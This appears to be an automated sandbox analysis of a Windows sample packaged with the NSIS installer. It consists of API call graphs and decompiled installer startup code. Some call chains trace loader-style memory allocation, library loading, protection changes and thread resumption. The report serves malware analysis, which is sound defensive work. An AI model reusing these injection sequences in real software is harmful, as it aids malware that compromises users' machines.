18849->18807 18851 4066a5 17 API calls 18850->18851 18852 4045cf SetDlgItemTextW 18851->18852 18852->18825 18853->18829 18854->18834 18855->18836 18857 4045a4 18856->18857 18858 4045aa SendMessageW 18856->18858 18857->18858 18858->18818 18860 4046ee 18859->18860 18861 404643 GetWindowLongW 18859->18861 18860->18797 18861->18860 18862 404658 18861->18862 18862->18860 18863 404685 GetSysColor 18862->18863 18864 404688 18862->18864 18863->18864 18865 404698 SetBkMode 18864->18865 18866 40468e SetTextColor 18864->18866 18867 4046b0 GetSysColor 18865->18867 18868 4046b6 18865->18868 18866->18865 18867->18868 18869 4046bd SetBkColor 18868->18869 18870 4046c7 18868->18870 18869->18870 18870->18860 18871 4046e1 CreateBrushIndirect 18870->18871 18872 4046da DeleteObject 18870->18872 18871->18860 18872->18871 18873 405809 18874 4059b3 18873->18874 18875 40582a GetDlgItem GetDlgItem GetDlgItem 18873->18875 18876 4059e4 18874->18876 18877 4059bc GetDlgItem CreateThread CloseHandle 18874->18877 18919 4045f9 SendMessageW 18875->18919 18879 405a0f 18876->18879 18881 405a34 18876->18881 18882 4059fb ShowWindow ShowWindow 18876->18882 18877->18876 18922 40579d 5 API calls 18877->18922 18883 405a1b 18879->18883 18884 405a6f 18879->18884 18880 40589a 18885 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 18880->18885 18889 40462b 8 API calls 18881->18889 18921 4045f9 SendMessageW 18882->18921 18887 405a23 18883->18887 18888 405a49 ShowWindow 18883->18888 18884->18881 18892 405a7d SendMessageW 18884->18892 18890 4058f3 SendMessageW SendMessageW 18885->18890 18891 40590f 18885->18891 18893 40459d SendMessageW 18887->18893 18894 405a69 18888->18894 18895 405a5b 18888->18895 18899 405a42 18889->18899 18890->18891 18897 405922 18891->18897 18898 405914 SendMessageW 18891->18898 18892->18899 18900 405a96 CreatePopupMenu 18892->18900 18893->18881 18896 40459d SendMessageW 18894->18896 18901 4056ca 24 API calls 18895->18901 18896->18884 18903 4045c4 18 API calls 18897->18903 18898->18897 18902 4066a5 17 API calls 18900->18902 18901->18894 18904 405aa6 AppendMenuW 18902->18904 18905 405932 18903->18905 18906 405ac3 GetWindowRect 18904->18906 18907 405ad6 TrackPopupMenu 18904->18907 18908 40593b ShowWindow 18905->18908 18909 40596f GetDlgItem SendMessageW 18905->18909 18906->18907 18907->18899 18910 405af1 18907->18910 18911 405951 ShowWindow 18908->18911 18912 40595e 18908->18912 18909->18899 18913 405996 SendMessageW SendMessageW 18909->18913 18914 405b0d SendMessageW 18910->18914 18911->18912 18920 4045f9 SendMessageW 18912->18920 18913->18899 18914->18914 18915 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 18914->18915 18917 405b4f SendMessageW 18915->18917 18917->18917 18918 405b78 GlobalUnlock SetClipboardData CloseClipboard 18917->18918 18918->18899 18919->18880 18920->18909 18921->18879 18923 32c09e6 18924 32c0a34 18923->18924 18925 32c0b76 CreateFileA 18924->18925 18926 32b372f 18924->18926 18927 40248a 18928 402da6 17 API calls 18927->18928 18929 40249c 18928->18929 18930 402da6 17 API calls 18929->18930 18931 4024a6 18930->18931 18944 402e36 18931->18944 18934 402c2a 18935 4024de 18937 4024ea 18935->18937 18948 402d84 18935->18948 18936 402da6 17 API calls 18938 4024d4 lstrlenW 18936->18938 18940 402509 RegSetValueExW 18937->18940 18941 403371 44 API calls 18937->18941 18938->18935 18942 40251f RegCloseKey 18940->18942 18941->18940 18942->18934 18945 402e51 18944->18945 18951 406503 18945->18951 18949 4066a5 17 API calls 18948->18949 18950 402d99 18949->18950 18950->18937 18952 406512 18951->18952 18953 4024b6 18952->18953 18954 40651d RegCreateKeyExW 18952->18954 18953->18934 18953->18935 18953->18936 18954->18953 18955 405c8e ShellExecuteExW 18956 32b3ce5 18957 32b3a89 18956->18957 18957->18956 18960 32b3d36 18957->18960 18961 32b3d1b 18960->18961 18961->18960 18965 32b3d29 18961->18965 18966 32c1e19 18961->18966 18967 32c1e29 18966->18967 18971 32c210d 18966->18971 18972 32c1274 18967->18972 18972->18972 18974 32c1295 18972->18974 18973 32c1354 LoadLibraryA 18981 32c13af 18973->18981 18974->18973 18985 32c1954 GetPEB 18974->18985 18978 32c1341 18979 32c13af 5 API calls 18978->18979 18980 32c134f 18979->18980 18980->18973 18982 32c13eb 18981->18982 18984 32c135c NtAllocateVirtualMemory 18982->18984 18997 32c1505 18982->18997 18984->18971 18987 32c196a 18985->18987 18986 32c1a4e 18986->18978 18987->18986 18990 32c1274 18987->18990 19101 32c1aa9 18987->19101 18989 32c1354 LoadLibraryA 18991 32c13af 4 API calls 18989->18991 18990->18989 18992 32c1954 4 API calls 18990->18992 18994 32c135c 18991->18994 18993 32c1341 18992->18993 18995 32c13af 4 API calls 18993->18995 18994->18978 18996 32c134f 18995->18996 18996->18989 19000 32bb5a7 18997->19000 19002 32bfe0c 19000->19002 19003 32b2abe 19000->19003 19007 32bf3c9 19000->19007 19014 32bdd00 19000->19014 19002->18982 19004 32b2ac6 19003->19004 19005 32c1e19 6 API calls 19004->19005 19006 32b2b37 19004->19006 19005->19004 19008 32c1e19 6 API calls 19007->19008 19010 32bf3ec 19008->19010 19009 32c1274 6 API calls 19009->19010 19010->19009 19011 32bf456 19010->19011 19013 32bf47e 19010->19013 19012 32c1274 6 API calls 19011->19012 19012->19013 19015 32bdd1b 19014->19015 19028 32b6f5d 19015->19028 19029 32b6f9d 19028->19029 19030 32c1e19 6 API calls 19029->19030 19031 32b3744 19030->19031 19032 32b6cdf 19031->19032 19033 32b6d1c 19032->19033 19034 32c1e19 6 API calls 19033->19034 19035 32b6d3c 19034->19035 19036 32b6f5d 6 API calls 19035->19036 19037 32c0358 19036->19037 19038 32b6cdf 6 API calls 19037->19038 19039 32c03b0 19038->19039 19048 32b70fb 19039->19048 19049 32c1e19 6 API calls 19048->19049 19050 32b712e 19049->19050 19057 32b7139 19050->19057 19052 32c0474 19053 32c1274 6 API calls 19052->19053 19054 32c04fd 19053->19054 19063 32c0590 19054->19063 19058 32b717e 19057->19058 19059 32c1e19 6 API calls 19058->19059 19060 32b71bf 19059->19060 19077 32c0da9 19060->19077 19062 32b7262 19062->19052 19064 32c05be 19063->19064 19065 32c1e19 6 API calls 19064->19065 19066 32c06d4 19065->19066 19086 32c09e6 19066->19086 19068 32c078e 19069 32c08c4 19068->19069 19070 32c29e5 19068->19070 19090 32c092d 19069->19090 19097 32c29ec 19070->19097 19074 32c0bb2 19075 32c0590 6 API calls 19074->19075 19076 32c0bd7 19075->19076 19078 32c0e25 19077->19078 19078->19062 19079 32c1354 LoadLibraryA 19078->19079 19081 32c1954 CreateFileA LoadLibraryA LoadLibraryA GetPEB NtAllocateVirtualMemory 19078->19081 19080 32c13af CreateFileA LoadLibraryA LoadLibraryA GetPEB NtAllocateVirtualMemory 19079->19080 19082 32c135c 19080->19082 19083 32c1341 19081->19083 19082->19062 19084 32c13af CreateFileA LoadLibraryA LoadLibraryA GetPEB NtAllocateVirtualMemory 19083->19084 19085 32c134f 19084->19085 19085->19079 19087 32c0a34 19086->19087 19088 32c0b76 CreateFileA 19087->19088 19089 32b372f 19087->19089 19088->19068 19089->19068 19091 32c1e19 6 API calls 19090->19091 19092 32c0956 19091->19092 19093 32c09e6 CreateFileA 19092->19093 19094 32c0973 19093->19094 19094->19074 19095 32c29ec 6 API calls 19094->19095 19096 32c2c2b 19095->19096 19096->19074 19098 32c29f5 19097->19098 19099 32c2aac 6 API calls 19098->19099 19100 32c0bd7 19099->19100 19103 32bb5a7 19101->19103 19102 32b3744 19102->18987 19103->19102 19104 32b2abe 6 API calls 19103->19104 19105 32bf3c9 6 API calls 19103->19105 19106 32bdd00 6 API calls 19103->19106 19104->19103 19105->19103 19106->19103 19107 402891 19108 402898 19107->19108 19114 402ba9 19107->19114 19109 402d84 17 API calls 19108->19109 19110 40289f 19109->19110 19111 4028ae SetFilePointer 19110->19111 19112 4028be 19111->19112 19111->19114 19115 4065af wsprintfW 19112->19115 19115->19114 19116 4014d7 19117 402d84 17 API calls 19116->19117 19118 4014dd Sleep 19117->19118 19120 402c2a 19118->19120 19121 6f672a7f 19122 6f672acf 19121->19122 19123 6f672a8f VirtualProtect 19121->19123 19123->19122 19124 4020d8 19125 4020ea 19124->19125 19135 40219c 19124->19135 19126 402da6 17 API calls 19125->19126 19128 4020f1 19126->19128 19127 401423 24 API calls 19131 4022f6 19127->19131 19129 402da6 17 API calls 19128->19129 19130 4020fa 19129->19130 19132 402110 LoadLibraryExW 19130->19132 19133 402102 GetModuleHandleW 19130->19133 19134 402121 19132->19134 19132->19135 19133->19132 19133->19134 19147 406aa4 19134->19147 19135->19127 19138 402132 19140 402151 19138->19140 19141 40213a 19138->19141 19139 40216b 19142 4056ca 24 API calls 19139->19142 19152 6f671817 19140->19152 19143 401423 24 API calls 19141->19143 19144 402142 19142->19144 19143->19144 19144->19131 19145 40218e FreeLibrary 19144->19145 19145->19131 19194 40668a WideCharToMultiByte 19147->19194 19149 406ac1 19150 406ac8 GetProcAddress 19149->19150 19151 40212c 19149->19151 19150->19151 19151->19138 19151->19139 19153 6f67184a 19152->19153 19195 6f671bff 19153->19195 19155 6f671851 19156 6f671976 19155->19156 19157 6f671862 19155->19157 19158 6f671869 19155->19158 19156->19144 19245 6f67243e 19157->19245 19229 6f672480 19158->19229 19163 6f6718af 19258 6f672655 19163->19258 19164 6f6718cd 19169 6f6718d3 19164->19169 19170 6f67191e 19164->19170 19165 6f67187f 19168 6f671885 19165->19168 19173 6f671890 19165->19173 19166 6f671898 19179 6f67188e 19166->19179 19255 6f672e23 19166->19255 19168->19179 19239 6f672b98 19168->19239 19277 6f671666 19169->19277 19171 6f672655 10 API calls 19170->19171 19177 6f67190f 19171->19177 19172 6f6718b5 19269 6f671654 19172->19269 19249 6f672810 19173->19249 19185 6f671965 19177->19185 19283 6f672618 19177->19283 19179->19163 19179->19164 19183 6f671896 19183->19179 19184 6f672655 10 API calls 19184->19177 19185->19156 19189 6f67196f GlobalFree 19185->19189 19189->19156 19191 6f671951 19191->19185 19287 6f6715dd wsprintfW 19191->19287 19192 6f67194a FreeLibrary 19192->19191 19194->19149 19290 6f6712bb GlobalAlloc 19195->19290 19197 6f671c26 19291 6f6712bb GlobalAlloc 19197->19291 19199 6f671e6b GlobalFree GlobalFree GlobalFree 19200 6f671e88 19199->19200 19211 6f671ed2 19199->19211 19202 6f67227e 19200->19202 19208 6f671e9d 19200->19208 19200->19211 19201 6f671d26 GlobalAlloc 19219 6f671c31 19201->19219 19203 6f6722a0 GetModuleHandleW 19202->19203 19202->19211 19204 6f6722c6 19203->19204 19205 6f6722b1 LoadLibraryW 19203->19205 19298 6f6716bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 19204->19298 19205->19204 19205->19211 19206 6f671d71 lstrcpyW 19210 6f671d7b lstrcpyW 19206->19210 19207 6f671d8f GlobalFree 19207->19219 19208->19211 19294 6f6712cc 19208->19294 19210->19219 19211->19155 19212 6f672318 19212->19211 19216 6f672325 lstrlenW 19212->19216 19213 6f672126 19297 6f6712bb GlobalAlloc 19213->19297 19299 6f6716bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 19216->19299 19217 6f6722d8 19217->19212 19227 6f672302 GetProcAddress 19217->19227 19219->19199 19219->19201 19219->19206 19219->19207 19219->19210 19219->19211 19219->19213 19220 6f672067 GlobalFree 19219->19220 19221 6f6721ae 19219->19221 19222 6f671dcd 19219->19222 19224 6f6712cc 2 API calls 19219->19224 19220->19219 19221->19211 19226 6f672216 lstrcpyW 19221->19226 19222->19219 19292 6f67162f GlobalSize GlobalAlloc 19222->19292 19223 6f67233f 19223->19211 19224->19219 19226->19211 19227->19212 19228 6f67212f 19228->19155 19233 6f672498 19229->19233 19230 6f6712cc GlobalAlloc lstrcpynW 19230->19233 19232 6f6725c1 GlobalFree 19232->19233 19236 6f67186f 19232->19236 19233->19230 19233->19232 19234 6f672540 GlobalAlloc WideCharToMultiByte 19233->19234 19235 6f67256b GlobalAlloc CLSIDFromString 19233->19235 19237 6f67258a 19233->19237 19301 6f67135a 19233->19301 19234->19232 19235->19232 19236->19165 19236->19166 19236->19179 19237->19232 19305 6f6727a4 19237->19305 19241 6f672baa 19239->19241 19240 6f672c4f ReadFile 19244 6f672c6d 19240->19244 19241->19240 19243 6f672d39 19243->19179 19308 6f672b42 19244->19308 19246 6f672453 19245->19246 19247 6f67245e GlobalAlloc 19246->19247 19248 6f671868 19246->19248 19247->19246 19248->19158 19253 6f672840 19249->19253 19250 6f6728ee 19252 6f6728f4 GlobalSize 19250->19252 19254 6f6728fe 19250->19254 19251 6f6728db GlobalAlloc 19251->19254 19252->19254 19253->19250 19253->19251 19254->19183 19256 6f672e2e 19255->19256 19257 6f672e6e GlobalFree 19256->19257 19312 6f6712bb GlobalAlloc 19258->19312 19260 6f67265f 19261 6f67270b lstrcpynW 19260->19261 19262 6f6726fa StringFromGUID2 19260->19262 19263 6f6726d8 MultiByteToWideChar 19260->19263 19264 6f67271e wsprintfW 19260->19264 19265 6f672742 GlobalFree 19260->19265 19266 6f672777 GlobalFree 19260->19266 19267 6f671312 2 API calls 19260->19267 19313 6f671381 19260->19313 19261->19260 19262->19260 19263->19260 19264->19260 19265->19260 19266->19172 19267->19260 19317 6f6712bb GlobalAlloc 19269->19317 19271 6f671659 19272 6f671666 2 API calls 19271->19272 19273 6f671663 19272->19273 19274 6f671312 19273->19274 19275 6f671355 GlobalFree 19274->19275 19276 6f67131b GlobalAlloc lstrcpynW 19274->19276 19275->19177 19276->19275 19278 6f671672 wsprintfW 19277->19278 19279 6f67169f lstrcpyW 19277->19279 19282 6f6716b8 19278->19282 19279->19282 19282->19184 19284 6f672626 19283->19284 19286 6f671931 19283->19286 19285 6f672642 GlobalFree 19284->19285 19284->19286 19285->19284 19286->19191 19286->19192 19288 6f671312 2 API calls 19287->19288 19289 6f6715fe 19288->19289 19289->19185 19290->19197 19291->19219 19293 6f67164d 19292->19293 19293->19222 19300 6f6712bb GlobalAlloc 19294->19300 19296 6f6712db lstrcpynW 19296->19211 19297->19228 19298->19217 19299->19223 19300->19296 19302 6f671361 19301->19302 19303 6f6712cc 2 API calls 19302->19303 19304 6f67137f 19303->19304 19304->19233 19306 6f6727b2 VirtualAlloc 19305->19306 19307 6f672808 19305->19307 19306->19307 19307->19237 19309 6f672b4d 19308->19309 19310 6f672b52 GetLastError 19309->19310 19311 6f672b5d 19309->19311 19310->19311 19311->19243 19312->19260 19314 6f6713ac 19313->19314 19315 6f67138a 19313->19315 19314->19260 19315->19314 19316 6f671390 lstrcpyW 19315->19316 19316->19314 19317->19271 19318 40175c 19319 402da6 17 API calls 19318->19319 19320 401763 19319->19320 19321 406187 2 API calls 19320->19321 19322 40176a 19321->19322 19323 406187 2 API calls 19322->19323 19323->19322 19324 32c46b0 19325 32b372f 19324->19325 19326 32c46ca 19324->19326 19326->19325 19337 32b2a0f 19326->19337 19328 32c4922 19329 32c1274 19329->19328 19330 32c1354 LoadLibraryA 19329->19330 19332 32c1954 6 API calls 19329->19332 19331 32c13af 6 API calls 19330->19331 19333 32c135c 19331->19333 19334 32c1341 19332->19334 19335 32c13af 6 API calls 19334->19335 19336 32c134f 19335->19336 19336->19330 19338 32b2a5e 19337->19338 19349 32c41b2 19338->19349 19340 32b2a75 19342 32b2abe 19340->19342 19347 32b2ab2 19340->19347 19341 32b2abe 6 API calls 19341->19347 19343 32c1e19 6 API calls 19342->19343 19345 32b2b37 19342->19345 19343->19342 19344 32bf3c9 6 API calls 19344->19347 19346 32bdd00 6 API calls 19346->19347 19347->19341 19347->19344 19347->19346 19348 32bfe0c 19347->19348 19351 32c41b7 19349->19351 19352 32c41f9 19351->19352 19353 32c4439 NtResumeThread 19352->19353 19354 32b3744 19353->19354 19355 401ede 19356 402d84 17 API calls 19355->19356 19357 401ee4 19356->19357 19358 402d84 17 API calls 19357->19358 19359 401ef0 19358->19359 19360 401f07 EnableWindow 19359->19360 19361 401efc ShowWindow 19359->19361 19362 402c2a 19360->19362 19361->19362 19363 40259e 19373 402de6 19363->19373 19366 402d84 17 API calls 19367 4025b1 19366->19367 19368 4025d9 RegEnumValueW 19367->19368 19369 4025cd RegEnumKeyW 19367->19369 19370 40292e 19367->19370 19371 4025ee RegCloseKey 19368->19371 19369->19371 19371->19370 19374 402da6 17 API calls 19373->19374 19375 402dfd 19374->19375 19376 4064d5 RegOpenKeyExW 19375->19376 19377 4025a8 19376->19377 19377->19366 19378 4015a3 19379 402da6 17 API calls 19378->19379 19380 4015aa SetFileAttributesW 19379->19380 19381 4015bc 19380->19381 19382 40252a 19383 402de6 17 API calls 19382->19383 19384 402534 19383->19384 19385 402da6 17 API calls 19384->19385 19386 40253d 19385->19386 19387 402548 RegQueryValueExW 19386->19387 19391 40292e 19386->19391 19388 40256e RegCloseKey 19387->19388 19389 402568 19387->19389 19388->19391 19389->19388 19393 4065af wsprintfW 19389->19393 19393->19388 19394 4021aa 19395 402da6 17 API calls 19394->19395 19396 4021b1 19395->19396 19397 402da6 17 API calls 19396->19397 19398 4021bb 19397->19398 19399 402da6 17 API calls 19398->19399 19400 4021c5 19399->19400 19401 402da6 17 API calls 19400->19401 19402 4021cf 19401->19402 19403 402da6 17 API calls 19402->19403 19404 4021d9 19403->19404 19405 402218 CoCreateInstance 19404->19405 19406 402da6 17 API calls 19404->19406 19409 402237 19405->19409 19406->19405 19407 401423 24 API calls 19408 4022f6 19407->19408 19409->19407 19409->19408 19410 4026ec 19411 402d84 17 API calls 19410->19411 19415 4026fb 19411->19415 19412 402745 ReadFile 19412->19415 19423 402838 19412->19423 19413 4061db ReadFile 19413->19415 19414 4027de 19414->19415 19414->19423 19424 406239 SetFilePointer 19414->19424 19415->19412 19415->19413 19415->19414 19416 402785 MultiByteToWideChar 19415->19416 19417 40283a 19415->19417 19420 4027ab SetFilePointer MultiByteToWideChar 19415->19420 19421 40284b 19415->19421 19415->19423 19416->19415 19433 4065af wsprintfW 19417->19433 19420->19415 19422 40286c SetFilePointer 19421->19422 19421->19423 19422->19423 19425 406255 19424->19425 19432 40626d 19424->19432 19426 4061db ReadFile 19425->19426 19427 406261 19426->19427 19428 406276 SetFilePointer 19427->19428 19429 40629e SetFilePointer 19427->19429 19427->19432 19428->19429 19430 406281 19428->19430 19429->19432 19431 40620a WriteFile 19430->19431 19431->19432 19432->19414 19433->19423 19434 40176f 19435 402da6 17 API calls 19434->19435 19436 401776 19435->19436 19437 401796 19436->19437 19438 40179e 19436->19438 19473 406668 lstrcpynW 19437->19473 19474 406668 lstrcpynW 19438->19474 19441 40179c 19445 4068ef 5 API calls 19441->19445 19442 4017a9 19443 405f37 3 API calls 19442->19443 19444 4017af lstrcatW 19443->19444 19444->19441 19450 4017bb 19445->19450 19446 40699e 2 API calls 19446->19450 19447 406133 2 API calls 19447->19450 19449 4017cd CompareFileTime 19449->19450 19450->19446 19450->19447 19450->19449 19451 40188d 19450->19451 19456 406668 lstrcpynW 19450->19456 19459 4066a5 17 API calls 19450->19459 19467 405cc8 MessageBoxIndirectW 19450->19467 19471 401864 19450->19471 19472 406158 GetFileAttributesW CreateFileW 19450->19472 19452 4056ca 24 API calls 19451->19452 19454 401897 19452->19454 19453 4056ca 24 API calls 19469 401879 19453->19469 19455 403371 44 API calls 19454->19455 19457 4018aa 19455->19457 19456->19450 19458 4018be SetFileTime 19457->19458 19460 4018d0 CloseHandle 19457->19460 19458->19460 19459->19450 19461 4018e1 19460->19461 19460->19469 19462 4018e6 19461->19462 19463 4018f9 19461->19463 19465 4066a5 17 API calls 19462->19465 19464 4066a5 17 API calls 19463->19464 19466 401901 19464->19466 19468 4018ee lstrcatW 19465->19468 19466->19469 19470 405cc8 MessageBoxIndirectW 19466->19470 19467->19450 19468->19466 19470->19469 19471->19453 19471->19469 19472->19450 19473->19441 19474->19442 19475 4023b2 19476 4023ba 19475->19476 19478 4023c0 19475->19478 19477 402da6 17 API calls 19476->19477 19477->19478 19479 402da6 17 API calls 19478->19479 19480 4023ce 19478->19480 19479->19480 19481 4023dc 19480->19481 19482 402da6 17 API calls 19480->19482 19483 402da6 17 API calls 19481->19483 19482->19481 19484 4023e5 WritePrivateProfileStringW 19483->19484 19485 401573 19486 401583 ShowWindow 19485->19486 19487 40158c 19485->19487 19486->19487 19488 402c2a 19487->19488 19489 40159a ShowWindow 19487->19489 19489->19488 19490 402434 19491 402467 19490->19491 19492 40243c 19490->19492 19494 402da6 17 API calls 19491->19494 19493 402de6 17 API calls 19492->19493 19495 402443 19493->19495 19496 40246e 19494->19496 19497 40244d 19495->19497 19501 40247b 19495->19501 19502 402e64 19496->19502 19499 402da6 17 API calls 19497->19499 19500 402454 RegDeleteValueW RegCloseKey 19499->19500 19500->19501 19503 402e71 19502->19503 19504 402e78 19502->19504 19503->19501 19504->19503 19506 402ea9 19504->19506 19507 4064d5 RegOpenKeyExW 19506->19507 19508 402ed7 19507->19508 19509 402ee1 19508->19509 19510 402f8c 19508->19510 19511 402ee7 RegEnumValueW 19509->19511 19518 402f0a 19509->19518 19510->19503 19512 402f71 RegCloseKey 19511->19512 19511->19518 19512->19510 19513 402f46 RegEnumKeyW 19514 402f4f RegCloseKey 19513->19514 19513->19518 19515 406a35 5 API calls 19514->19515 19517 402f5f 19515->19517 19516 402ea9 6 API calls 19516->19518 19519 402f81 19517->19519 19520 402f63 RegDeleteKeyW 19517->19520 19518->19512 19518->19513 19518->19514 19518->19516 19519->19510 19520->19510 19521 401735 19522 402da6 17 API calls 19521->19522 19523 40173c SearchPathW 19522->19523 19524 401757 19523->19524 19525 40167b 19526 402da6 17 API calls 19525->19526 19527 401682 19526->19527 19528 402da6 17 API calls 19527->19528 19529 40168b 19528->19529 19530 402da6 17 API calls 19529->19530 19531 401694 MoveFileW 19530->19531 19532 4016a0 19531->19532 19533 4016a7 19531->19533 19535 401423 24 API calls 19532->19535 19534 40699e 2 API calls 19533->19534 19537 4022f6 19533->19537 19536 4016b6 19534->19536 19535->19537 19536->19537 19538 406428 36 API calls 19536->19538 19538->19532

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 35 40390b-403925 GetTempPathW call 40360f 33->35 36 403801-403806 34->36 37 403808-40380e 34->37 46 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 35->46 47 40397d-403995 DeleteFileW call 4030d0 35->47 36->36 36->37 39 403810-403814 37->39 40 403815-403819 37->40 39->40 41 4038d9-4038e7 call 405f64 40->41 42 40381f-403825 40->42 41->32 57 4038e9-4038ea 41->57 44 403827-40382e 42->44 45 40383f-403878 42->45 49 403830-403833 44->49 50 403835 44->50 51 403894-4038ce 45->51 52 40387a-40387f 45->52 46->47 66 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 46->66 62 40399b-4039a1 47->62 63 403b6c-403b7a call 403c25 OleUninitialize 47->63 49->45 49->50 50->45 60 4038d0-4038d4 51->60 61 4038d6-4038d8 51->61 52->51 58 403881-403889 52->58 57->32 64 403890 58->64 65 40388b-40388e 58->65 60->61 67 4038f9-403906 call 406668 60->67 61->41 68 4039a7-4039ba call 405f64 62->68 69 403a48-403a4f call 403d17 62->69 79 403b91-403b97 63->79 80 403b7c-403b8b call 405cc8 ExitProcess 63->80 64->51 65->51 65->64 66->47 66->63 67->35 81 403a0c-403a19 68->81 82 4039bc-4039f1 68->82 78 403a54-403a57 69->78 78->63 84 403b99-403bae GetCurrentProcess OpenProcessToken 79->84 85 403c0f-403c17 79->85 89 403a1b-403a29 call 40603f 81->89 90 403a5c-403a70 call 405c33 lstrcatW 81->90 86 4039f3-4039f7 82->86 92 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 84->92 93 403bdf-403bed call 406a35 84->93 87 403c19 85->87 88 403c1c-403c1f ExitProcess 85->88 95 403a00-403a08 86->95 96 4039f9-4039fe 86->96 87->88 89->63 107 403a2f-403a45 call 406668 * 2 89->107 105 403a72-403a78 lstrcatW 90->105 106 403a7d-403a97 lstrcatW lstrcmpiW 90->106 92->93 103 403bfb-403c06 ExitWindowsEx 93->103 104 403bef-403bf9 93->104 95->86 100 403a0a 95->100 96->95 96->100 100->81 103->85 108 403c08-403c0a call 40140b 103->108 104->103 104->108 105->106 109 403b6a 106->109 110 403a9d-403aa0 106->110 107->69 108->85 109->63 115 403aa2-403aa7 call 405b99 110->115 116 403aa9 call 405c16 110->116 120 403aae-403abe SetCurrentDirectoryW 115->120 116->120 123 403ac0-403ac6 call 406668 120->123 124 403acb-403af7 call 406668 120->124 123->124 128 403afc-403b17 call 4066a5 DeleteFileW 124->128 131 403b57-403b61 128->131 132 403b19-403b29 CopyFileW 128->132 131->128 133 403b63-403b65 call 406428 131->133 132->131 134 403b2b-403b4b call 406428 call 4066a5 call 405c4b 132->134 133->109 134->131 142 403b4d-403b54 CloseHandle 134->142 142->131
                                                              C-Code - Quality: 79%
                                                              			_entry_() {
                                                              				WCHAR* _v8;
                                                              				signed int _v12;
                                                              				void* _v16;
                                                              				signed int _v20;
                                                              				int _v24;
                                                              				int _v28;
                                                              				struct _TOKEN_PRIVILEGES _v40;
                                                              				signed char _v42;
                                                              				int _v44;
                                                              				signed int _v48;
                                                              				intOrPtr _v278;
                                                              				signed short _v310;
                                                              				struct _OSVERSIONINFOW _v324;
                                                              				struct _SHFILEINFOW _v1016;
                                                              				intOrPtr* _t88;
                                                              				WCHAR* _t92;
                                                              				char* _t94;
                                                              				void _t97;
                                                              				void* _t116;
                                                              				WCHAR* _t118;
                                                              				signed int _t120;
                                                              				intOrPtr* _t124;
                                                              				void* _t138;
                                                              				void* _t144;
                                                              				void* _t149;
                                                              				void* _t153;
                                                              				void* _t158;
                                                              				signed int _t168;
                                                              				void* _t171;
                                                              				void* _t176;
                                                              				intOrPtr _t178;
                                                              				intOrPtr _t179;
                                                              				intOrPtr* _t180;
                                                              				int _t189;
                                                              				void* _t190;
                                                              				void* _t199;
                                                              				signed int _t205;
                                                              				signed int _t210;
                                                              				signed int _t215;
                                                              				signed int _t217;
                                                              				int* _t219;
                                                              				signed int _t227;
                                                              				signed int _t230;
                                                              				CHAR* _t232;
                                                              				char* _t233;
                                                              				signed int _t234;
                                                              				WCHAR* _t235;
                                                              				void* _t251;
                                                              
                                                              				_t217 = 0x20;
                                                              				_t189 = 0;
                                                              				_v24 = 0;
                                                              				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                              				_v20 = 0;
                                                              				SetErrorMode(0x8001); // executed
                                                              				_v324.szCSDVersion = 0;
                                                              				_v48 = 0;
                                                              				_v44 = 0;
                                                              				_v324.dwOSVersionInfoSize = 0x11c;
                                                              				if(GetVersionExW( &_v324) == 0) {
                                                              					_v324.dwOSVersionInfoSize = 0x114;
                                                              					GetVersionExW( &_v324);
                                                              					asm("sbb eax, eax");
                                                              					_v42 = 4;
                                                              					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                              				}
                                                              				if(_v324.dwMajorVersion < 0xa) {
                                                              					_v310 = _v310 & 0x00000000;
                                                              				}
                                                              				 *0x42a318 = _v324.dwBuildNumber;
                                                              				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                              				if( *0x42a31e != 0x600) {
                                                              					_t180 = E00406A35(_t189);
                                                              					if(_t180 != _t189) {
                                                              						 *_t180(0xc00);
                                                              					}
                                                              				}
                                                              				_t232 = "UXTHEME";
                                                              				do {
                                                              					E004069C5(_t232); // executed
                                                              					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                              				} while ( *_t232 != 0);
                                                              				E00406A35(0xb);
                                                              				 *0x42a264 = E00406A35(9);
                                                              				_t88 = E00406A35(7);
                                                              				if(_t88 != _t189) {
                                                              					_t88 =  *_t88(0x1e);
                                                              					if(_t88 != 0) {
                                                              						 *0x42a31c =  *0x42a31c | 0x00000080;
                                                              					}
                                                              				}
                                                              				__imp__#17();
                                                              				__imp__OleInitialize(_t189); // executed
                                                              				 *0x42a320 = _t88;
                                                              				SHGetFileInfoW(0x421708, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                              				E00406668(0x429260, L"NSIS Error");
                                                              				_t92 = GetCommandLineW();
                                                              				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.generic.ml.10062.exe\" ";
                                                              				E00406668(_t233, _t92);
                                                              				_t94 = _t233;
                                                              				_t234 = 0x22;
                                                              				 *0x42a260 = 0x400000;
                                                              				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.generic.ml.10062.exe\" " - _t234; // 0x22
                                                              				if(_t251 == 0) {
                                                              					_t217 = _t234;
                                                              					_t94 =  &M00435002;
                                                              				}
                                                              				_t199 = CharNextW(E00405F64(_t94, _t217));
                                                              				_v16 = _t199;
